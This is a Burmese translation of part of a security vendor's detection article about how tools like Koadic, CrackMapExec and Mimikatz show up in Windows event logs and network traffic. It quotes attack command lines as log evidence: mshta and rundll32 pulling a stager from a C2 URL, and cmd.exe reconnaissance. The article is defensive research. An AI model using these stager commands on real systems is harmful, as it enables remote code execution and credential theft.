ထမင်သ။ 9. enum_avproducts module ၏ ကလန်ရက်လုပ်ဆောင်ချက်

မကဌာခဏ WMI စစ်ဆေသမဟု (Trace WMI-Activity) သည် WQL စုံစမ်သမဟုမျာသနဟင့်ပတ်သက်သော အသုံသဝင်သောအချက်အလက်မျာသကို သင်ရဟာဖလေနိုင်သည့် ဖဌစ်ရပ်မျာသတလင် ပိတ်ထာသနိုင်သည်။ သို့သော် ၎င်သကိုဖလင့်ထာသလျဟင် enum_avproducts script ကို run ပါက ID 11 ပါသောဖဌစ်ရပ်ကို သိမ်သဆည်သမည်ဖဌစ်သည်။ ၎င်သတလင် တောင်သဆိုချက်ပေသပို့သောအသုံသပဌုသူအမည်နဟင့် rootSecurityCenter2 namespace တလင်အမည်ပါရဟိသည်။

CME မော်ဂျူသတစ်ခုစီတလင် LDAP နဟင့် SMB ရဟိ Bloodhound-specific လုပ်ဆောင်ချက်ပါရဟိသော အလုပ်ချိန်ဇယာသစနစ်တလင် သတ်မဟတ်ထာသသော WQL မေသမဌန်သမဟုမျာသ သို့မဟုတ် အလုပ်အမျိုသအစာသတစ်ခုဖန်တီသခဌင်သပဲဖဌစ်ဖဌစ်၊ LDAP နဟင့် SMB ရဟိ Bloodhound-specific လုပ်ဆောင်ချက်ပါရဟိသော CME module တစ်ခုစီတလင် ၎င်သ၏ကိုယ်ပိုင်လက်ရာမျာသရဟိသည်။

KOADIC

Koadic ၏ထူသခဌာသသောအင်္ဂါရပ်မဟာ Windows တလင်တည်ဆောက်ထာသသော JavaScript နဟင့် VBScript စကာသပဌန်မျာသကိုအသုံသပဌုခဌင်သဖဌစ်သည်။ ကသဘောအရ၊ ၎င်သသည် ပဌင်ပအာသကိုသမဟုမရဟိဘဲ ပုံမဟန် Windows ကိရိယာမျာသကို အသုံသပဌု၍ မဌေယာလမ်သကဌောင်သကို လိုက်လျောညီထလေဖဌစ်စေသည်။ ရောဂါပိုသကူသစက်ပဌီသနောက် စက်ပေါ်တလင် "implant" ကို တပ်ဆင်ထာသသောကဌောင့် ထိန်သချုပ်နိုင်စေမည့် Command & Control (CnC) အပဌည့်အစုံအတလက် ကိရိယာတစ်ခုဖဌစ်သည်။ Koadic ဝေါဟာရအရ ထိုကဲ့သို့သောစက်ကို "ဖုတ်ကောင်" ဟုခေါ်သည်။ သာသကောင်၏ဘက်တလင် အပဌည့်အဝလည်ပတ်ရန်အတလက် အခလင့်အရေသမျာသ မလုံလောက်ပါက၊ Koadic သည် User Account Control bypass (UAC bypass) နည်သပညာမျာသကို အသုံသပဌု၍ ၎င်သတို့ကို မဌဟင့်တင်နိုင်မည်ဖဌစ်သည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 10. Koadic Shell

သာသကောင်သည် Command & Control ဆာဗာနဟင့် ဆက်သလယ်မဟု စတင်ရပါမည်။ ၎င်သကိုလုပ်ဆောင်ရန်၊ သူမသည် ယခင်ပဌင်ဆင်ထာသသည့် URI ကိုဆက်သလယ်ပဌီသ stagers မျာသထဲမဟတစ်ခုကိုအသုံသပဌု၍ ပင်မ Koadic ကိုယ်ထည်ကိုရယူရန်လိုအပ်သည်။ ပုံတလင်။ ပုံ 11 သည် mshta stager အတလက် ဥပမာတစ်ခုပဌသည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 11. CnC ဆာဗာဖဌင့် စက်ရဟင်တစ်ခုကို စတင်ခဌင်သ။

တုံ့ပဌန်မဟုပဌောင်သလဲနိုင်သော WS ကိုအခဌေခံ၍ လုပ်ဆောင်ချက်သည် WScript.Shell မဟတဆင့်ဖဌစ်ပေါ်ကဌောင်သ ရဟင်သရဟင်သလင်သလင်သဖဌစ်လာပဌီသ STAGER၊ SESSIONKEY၊ JOBKEY၊ JOBKEYPATH၊ EXPIRE တလင် လက်ရဟိစက်ရဟင်၏ ကန့်သတ်ဘောင်မျာသဆိုင်ရာ အဓိကအချက်အလက်မျာသ ပါဝင်ပါသည်။ ၎င်သသည် CnC ဆာဗာနဟင့် HTTP ချိတ်ဆက်မဟုတလင် ပထမဆုံသ တောင်သဆိုချက်-တုံ့ပဌန်မဟုအတလဲဖဌစ်သည်။ နောက်ဆက်တလဲတောင်သဆိုချက်မျာသသည် မော်ဂျူသမျာသ (implants) ဟုခေါ်သော လုပ်ဆောင်နိုင်စလမ်သနဟင့် တိုက်ရိုက်သက်ဆိုင်ပါသည်။ Koadic modules မျာသအာသလုံသသည် CnC နဟင့် တက်ကဌလသော session တစ်ခုဖဌင့်သာ အလုပ်လုပ်ပါသည်။

မီမီကတ်ဇ်

CME သည် Bloodhound နဟင့်အလုပ်လုပ်သကဲ့သို့ Koadic သည် သီသခဌာသပရိုဂရမ်တစ်ခုအနေဖဌင့် Mimikatz နဟင့်အလုပ်လုပ်ပဌီသ ၎င်သကိုစတင်ရန် နည်သလမ်သမျာသစလာရဟိသည်။ အောက်တလင် Mimikatz implant ကိုဒေါင်သလုဒ်လုပ်ရန်အတလက် တောင်သဆိုချက်-တုံ့ပဌန်မဟုအတလဲတစ်ခုဖဌစ်သည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 12. Mimikatz ကို Koadic သို့ လလဟဲပဌောင်သပါ။

တောင်သဆိုချက်ရဟိ URI ဖော်မတ်သည် ပဌောင်သလဲသလာသသည်ကို သင်မဌင်နိုင်သည်။ ယခု ၎င်သတလင် ရလေသချယ်ထာသသော module အတလက် တာဝန်ရဟိသည့် csrf variable အတလက် တန်ဖိုသတစ်ခုပါရဟိသည်။ သူမ၏အမည်ကို ဂရုမစိုက်ပါနဟင့်။ CSRF ကို အမျာသအာသဖဌင့် ကလဲပဌာသစလာ နာသလည်ကဌသည်ကို ကျလန်ုပ်တို့အာသလုံသ သိပါသည်။ တုံ့ပဌန်မဟုသည် Koadic ၏ ပင်မကိုယ်ထည်ဖဌစ်ပဌီသ၊ Mimikatz နဟင့်ဆက်စပ်သောကုဒ်ကို ထည့်သလင်သထာသသည်။ ၎င်သသည် အလလန်ကဌီသမာသသောကဌောင့် အဓိကအချက်မျာသကို ကဌည့်ကဌပါစို့။ ကနေရာတလင် ကျလန်ုပ်တို့တလင် Mimikatz စာကဌည့်တိုက်ကို ထည့်သလင်သမည့် base64 တလင် ကုဒ်နံပါတ်တပ်ထာသသော .NET အတန်သအစာသနဟင့် Mimikatz ကို စတင်ရန် အကဌောင်သပဌချက်မျာသရဟိသည်။ လုပ်ဆောင်မဟုရလဒ်ကို ရဟင်သလင်သသောစာသာသဖဌင့် ကလန်ရက်ပေါ်တလင် ထုတ်လလဟင့်သည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 13. အဝေသထိန်သစက်ပေါ်တလင် Mimikatz ကိုအသုံသပဌုခဌင်သ၏ရလဒ်

Exec_cmd

Koadic တလင် အဝေသမဟ အမိန့်ပေသချက်မျာသကို လုပ်ဆောင်နိုင်သော module မျာသလည်သ ရဟိပါသည်။ ကနေရာတလင် တူညီသော URI မျိုသဆက်နည်သလမ်သနဟင့် ရင်သနဟီသသော sid နဟင့် csrf variables မျာသကို တလေ့ရမည်ဖဌစ်ပါသည်။ exec_cmd module ၏အခဌေအနေတလင်၊ shell command မျာသကိုလုပ်ဆောင်နိုင်သောကိုယ်ထည်ထဲသို့ code ပေါင်သထည့်သည်။ အောက်တလင် CnC ဆာဗာ၏ HTTP တုံ့ပဌန်မဟုတလင်ပါရဟိသော ထိုကုဒ်ကို ပဌထာသသည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 14. Implant ကုဒ် exec_cmd

ကုဒ်လုပ်ဆောင်မဟုအတလက် ရင်သနဟီသသော WS ရည်ညလဟန်သချက်ပါသော GAWTUUGCFI ကိန်သရဟင်သည် လိုအပ်ပါသည်။ ၎င်သ၏အကူအညီဖဌင့်၊ implant သည် shell ကိုခေါ်ဆိုပဌီသ output data stream နဟင့် shell.run တို့ကိုပဌန်ခဌင်သမရဟိဘဲ code ၏အကိုင်သအခက်နဟစ်ခု - shell.exec ကိုလုပ်ဆောင်သည်။

Koadic သည် ပုံမဟန်ကိရိယာတစ်ခုမဟုတ်သော်လည်သ ၎င်သတလင်တရာသဝင်အသလာသအလာတလင်တလေ့ရဟိနိုင်သည့် ၎င်သ၏ကိုယ်ပိုင်လက်ရာမျာသရဟိသည်။

  • HTTP တောင်သဆိုမဟုမျာသ၏ အထူသဖလဲ့စည်သမဟု၊
  • winHttpRequests API ကိုသုံသပဌီသ၊
  • ActiveXObject မဟတဆင့် WScript.Shell အရာဝတ္ထုကို ဖန်တီသခဌင်သ၊
  • ကဌီသမာသသောအကောင်ထည်ဖော်နိုင်သောကိုယ်ထည်။

ကနညသချိတ်ဆက်မဟုကို Stager မဟ အစပဌုထာသသောကဌောင့် Windows ဖဌစ်ရပ်မျာသမဟတစ်ဆင့် ၎င်သ၏လုပ်ဆောင်ချက်ကို သိရဟိနိုင်သည်။ mshta အတလက်၊ ကသည်မဟာ event 4688 ဖဌစ်ပဌီသ၊ start attribute ဖဌင့် process တစ်ခုဖန်တီသခဌင်သကို ညလဟန်ပဌသည်-

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Koadic လည်ပတ်နေချိန်တလင်၊ ၎င်သကို ပဌီသပဌည့်စုံသော သလင်ပဌင်လက္ခဏာမျာသဖဌင့် အခဌာသ 4688 ဖဌစ်ရပ်မျာသကို သင်တလေ့မဌင်နိုင်သည်-

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

တလေ့ရဟိချက်မျာသ

ရာဇ၀တ်ကောင်မျာသကဌာသတလင် ကိုယ်ထူကိုယ်ထလမ်သကဌောင်သသည် ရေပန်သစာသလာသည်။ ၎င်သတို့သည် ၎င်သတို့၏လိုအပ်ချက်မျာသအတလက် Windows တလင် တည်ဆောက်ထာသသော ကိရိယာမျာသနဟင့် ယန္တရာသမျာသကို အသုံသပဌုကဌသည်။ ကမူအရ APT အစီရင်ခံစာမျာသတလင် ပိုမိုထင်ရဟာသလာပဌီသနောက် နာမည်ကဌီသကိရိယာ Koadic၊ CrackMapExec နဟင့် Impacket တို့ကို ကျလန်ုပ်တို့ တလေ့မဌင်နေရသည်။ ကကိရိယာမျာသအတလက် GitHub ရဟိ ခက်ရင်သအရေအတလက်လည်သ တိုသလာနေပဌီသ အသစ်မျာသ ပေါ်လာသည် (ယခု ၎င်သတို့အနက်မဟ တစ်ထောင်ခန့်ရဟိနေပဌီ)။ လမ်သကဌောင်သသည် ၎င်သ၏ရိုသရဟင်သမဟုကဌောင့် လူကဌိုက်မျာသလာသည်- တိုက်ခိုက်သူမျာသသည် ပဌင်ပကိရိယာမျာသ မလိုအပ်ပါ၊ ၎င်သတို့သည် သာသကောင်မျာသ၏ စက်မျာသတလင် ရဟိနဟင့်ပဌီသဖဌစ်ကာ လုံခဌုံရေသအစီအမံမျာသကို ကျော်လလဟာသနိုင်ရန် ကူညီပေသပါသည်။ ကျလန်ုပ်တို့သည် ကလန်ရက်ဆက်သလယ်ရေသကို လေ့လာရန် အာရုံစိုက်သည်- အထက်တလင်ဖော်ပဌထာသသော ကိရိယာတစ်ခုစီသည် ကလန်ရက်အသလာသအလာတလင် ၎င်သ၏ကိုယ်ပိုင်ခဌေရာမျာသကို ချန်ထာသခဲ့သည်၊ ၎င်သတို့ကို အသေသစိတ်လေ့လာခဌင်သဖဌင့် ကျလန်ုပ်တို့၏ထုတ်ကုန်ကို သင်ကဌာသနိုင်စေပါသည်။ PT Network Attack Discovery ၎င်သတို့နဟင့် ပတ်သက်သည့် ဆိုက်ဘာဖဌစ်ရပ်မျာသ၏ ကလင်သဆက်တစ်ခုလုံသကို နောက်ဆုံသတလင် စုံစမ်သစစ်ဆေသရန် ကူညီပေသသည့် ၎င်သတို့ကို ရဟာဖလေတလေ့ရဟိသည်။

စာရေသဆရာမျာသ:

  • Anton Tyurin၊ ကျလမ်သကျင်ဝန်ဆောင်မဟုဌာန၏အကဌီသအကဲ၊ PT Expert လုံခဌုံရေသစင်တာ၊ အပဌုသဘောဆောင်သောနည်သပညာမျာသ
  • Egor Podmokov၊ ကျလမ်သကျင်သူ၊ PT Expert Security Center၊ Positive Technologies

source: www.habr.com

မဟတ်ချက် Add